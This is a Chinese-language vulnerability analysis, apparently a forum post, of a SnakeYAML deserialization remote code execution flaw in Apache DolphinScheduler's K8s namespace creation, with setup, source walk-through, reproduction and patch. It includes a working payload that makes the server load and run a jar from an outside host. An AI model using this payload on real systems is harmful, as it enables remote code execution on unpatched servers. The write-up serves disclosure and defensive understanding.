漏洞描述

在Apache Dolphinscheduler中暴露远程代码执行。此问题会影响Apache Dolphinescent:3.2.1之前的版本。我们建议用户将Apache Dolphinescent升级到3.2.1版本,该版本可以修复此问题。

漏洞版本

3.0.0 <= version < 3.2.1

环境搭建

官网下载源码及bin运行包

tar -xvzf apache-dolphinscheduler-*-bin.tar.gz
cd apache-dolphinscheduler-*-bin
bash ./bin/dolphinscheduler-daemon.sh start standalone-server

修改jvm在standalone-server/bin/start.sh

访问http://localhost:12345/dolphinscheduler/ui

  • admin/dolphinscheduler123

代码分析

先看修复补丁:[Improvement][K8S] Remove ResourceQuota by Gallardot · Pull Request #14991 · apache/dolphinscheduler · GitHub

比较直观的看出漏洞点从K8sNamespaceController进入,断点到实现类:
org.apache.dolphinscheduler.api.service.impl.K8SNamespaceServiceImpl#createK8sNamespace

@Override  
public Map<String, Object> createK8sNamespace(User loginUser, String namespace, Long clusterCode, Double limitsCpu,  
                                              Integer limitsMemory) {  
    Map<String, Object> result = new HashMap<>();  
    if (isNotAdmin(loginUser, result)) {  
        log.warn("Only admin can create K8s namespace, current login user name:{}.", loginUser.getUserName());  
        return result;  
    }  

    if (StringUtils.isEmpty(namespace)) {  
        log.warn("Parameter namespace is empty.");  
        putMsg(result, Status.REQUEST_PARAMS_NOT_VALID_ERROR, Constants.NAMESPACE);  
        return result;  
    }  

    if (clusterCode == null) {  
        log.warn("Parameter clusterCode is null.");  
        putMsg(result, Status.REQUEST_PARAMS_NOT_VALID_ERROR, Constants.CLUSTER);  
        return result;  
    }  

    if (limitsCpu != null && limitsCpu < 0.0) {  
        log.warn("Parameter limitsCpu is invalid.");  
        putMsg(result, Status.REQUEST_PARAMS_NOT_VALID_ERROR, Constants.LIMITS_CPU);  
        return result;  
    }  

    if (limitsMemory != null && limitsMemory < 0) {  
        log.warn("Parameter limitsMemory is invalid.");  
        putMsg(result, Status.REQUEST_PARAMS_NOT_VALID_ERROR, Constants.LIMITS_MEMORY);  
        return result;  
    }  

    if (checkNamespaceExistInDb(namespace, clusterCode)) {  
        log.warn("K8S namespace already exists.");  
        putMsg(result, Status.K8S_NAMESPACE_EXIST, namespace, clusterCode);  
        return result;  
    }  

    Cluster cluster = clusterMapper.queryByClusterCode(clusterCode);  
    if (cluster == null) {  
        log.error("Cluster does not exist, clusterCode:{}", clusterCode);  
        putMsg(result, Status.CLUSTER_NOT_EXISTS, namespace, clusterCode);  
        return result;  
    }  

    long code = 0L;  
    try {  
        code = CodeGenerateUtils.getInstance().genCode();  
        cluster.setCode(code);  
    } catch (CodeGenerateUtils.CodeGenerateException e) {  
        log.error("Generate cluster code error.", e);  
    }  
    if (code == 0L) {  
        putMsg(result, Status.INTERNAL_SERVER_ERROR_ARGS, "Error generating cluster code");  
        return result;  
    }  

    K8sNamespace k8sNamespaceObj = new K8sNamespace();  
    Date now = new Date();  

    k8sNamespaceObj.setCode(code);  
    k8sNamespaceObj.setNamespace(namespace);  
    k8sNamespaceObj.setClusterCode(clusterCode);  
    k8sNamespaceObj.setUserId(loginUser.getId());  
    k8sNamespaceObj.setLimitsCpu(limitsCpu);  
    k8sNamespaceObj.setLimitsMemory(limitsMemory);  
    k8sNamespaceObj.setPodReplicas(0);  
    k8sNamespaceObj.setPodRequestCpu(0.0);  
    k8sNamespaceObj.setPodRequestMemory(0);  
    k8sNamespaceObj.setCreateTime(now);  
    k8sNamespaceObj.setUpdateTime(now);  

    if (!Constants.K8S_LOCAL_TEST_CLUSTER_CODE.equals(k8sNamespaceObj.getClusterCode())) {  
        try {  
            String yamlStr = genDefaultResourceYaml(k8sNamespaceObj);  
            k8sClientService.upsertNamespaceAndResourceToK8s(k8sNamespaceObj, yamlStr);  
        } catch (Exception e) {  
            log.error("Namespace create to k8s error", e);  
            putMsg(result, Status.K8S_CLIENT_OPS_ERROR, e.getMessage());  
            return result;  
        }  
    }  

    k8sNamespaceMapper.insert(k8sNamespaceObj);  
    log.info("K8s namespace create complete, namespace:{}.", k8sNamespaceObj.getNamespace());  
    putMsg(result, Status.SUCCESS);  

    return result;  
}

可以看到前半段对请求参数进行了校验判断,并使用参数创建了k8sNamespaceObj
重点在如下:

if (!Constants.K8S_LOCAL_TEST_CLUSTER_CODE.equals(k8sNamespaceObj.getClusterCode())) {  
    try {  
        String yamlStr = genDefaultResourceYaml(k8sNamespaceObj);  
        k8sClientService.upsertNamespaceAndResourceToK8s(k8sNamespaceObj, yamlStr);  
    } catch (Exception e) {  
        log.error("Namespace create to k8s error", e);  
        putMsg(result, Status.K8S_CLIENT_OPS_ERROR, e.getMessage());  
        return result;  
    }  
}

通过k8sNamespaceObj转化为yamlStr(因为k8sNamespaceObj对象可控,所以yamlStr也可控)
步入到K8sClientService#upsertNamespaceAndResourceToK8s

public ResourceQuota upsertNamespaceAndResourceToK8s(K8sNamespace k8sNamespace,  
                                                     String yamlStr) throws RemotingException {  
    if (!checkNamespaceToK8s(k8sNamespace.getNamespace(), k8sNamespace.getClusterCode())) {  
        throw new RemotingException(String.format(  
                "namespace %s does not exist in k8s cluster, please create namespace in k8s cluster first",  
                k8sNamespace.getNamespace()));  
    }  
    return upsertNamespacedResourceToK8s(k8sNamespace, yamlStr);  
}

首先对k8s环境进行了校验,成功后会进入到K8sClientService#upsertNamespacedResourceToK8s

private ResourceQuota upsertNamespacedResourceToK8s(K8sNamespace k8sNamespace,  
                                                    String yamlStr) throws RemotingException {  

    KubernetesClient client = k8sManager.getK8sClient(k8sNamespace.getClusterCode());  

    // 创建资源  
    ResourceQuota queryExist = client.resourceQuotas()  
            .inNamespace(k8sNamespace.getNamespace())  
            .withName(k8sNamespace.getNamespace())  
            .get();  

    ResourceQuota body = yaml.loadAs(yamlStr, ResourceQuota.class);  

    if (queryExist != null) {  
        if (k8sNamespace.getLimitsCpu() == null && k8sNamespace.getLimitsMemory() == null) {  
            client.resourceQuotas().inNamespace(k8sNamespace.getNamespace())  
                    .withName(k8sNamespace.getNamespace())  
                    .delete();  
            return null;  
        }  
    }  

    return client.resourceQuotas().inNamespace(k8sNamespace.getNamespace())  
            .withName(k8sNamespace.getNamespace())  
            .createOrReplace(body);  
}

前面获取k8s对象然后创建资源,然后对yamlStr通过snakeYaml.loadAs进行了反序列化
snakeYmal的创建如下:

那么已知SnakeYaml反序列化存在利用,直接开始复现

漏洞复现

由于我使用standalone部署,所以无法通过k8s环境判断,这里直接通过idea evaluate expression复现
首先进入dolphinscheduler后台

安全中心->集群管理->创建集群
创建任意集群(这里因为我使用的不是k8s环境,所以任意)

然后在安全中心->k8s命名空间管理->创建命名空间

k8s集群选择刚刚创建的集群,命名空间为恶意的snakeYaml反序列化利用 payload

!!javax.script.ScriptEngineManager [   !!java.net.URLClassLoader [[     !!java.net.URL ["http://172.18.176.1:8377/yaml-payload.jar"]   ]] ]

断点在org.apache.dolphinscheduler.api.k8s.K8sClientService#upsertNamespaceAndResourceToK8s,因为在这里还没经过k8s环境判断,且已经初始化好yaml对象

可以看到此时yamlStr可控,然后使用evaluate expression执行以下(如果通过k8s环境校验,本身就会执行)

ResourceQuota body = yaml.loadAs(yamlStr, ResourceQuota.class);

成功接收请求

成功执行任意代码

漏洞修复

还是看补丁[Improvement][K8S] Remove ResourceQuota by Gallardot · Pull Request #14991 · apache/dolphinscheduler · GitHub
删除了通过yaml.loadAs来反序列化对象的代码,无法再进行利用

点击收藏 | 0 关注 | 1 打赏
  • 动动手指,沙发就是你的了!
登录 后跟帖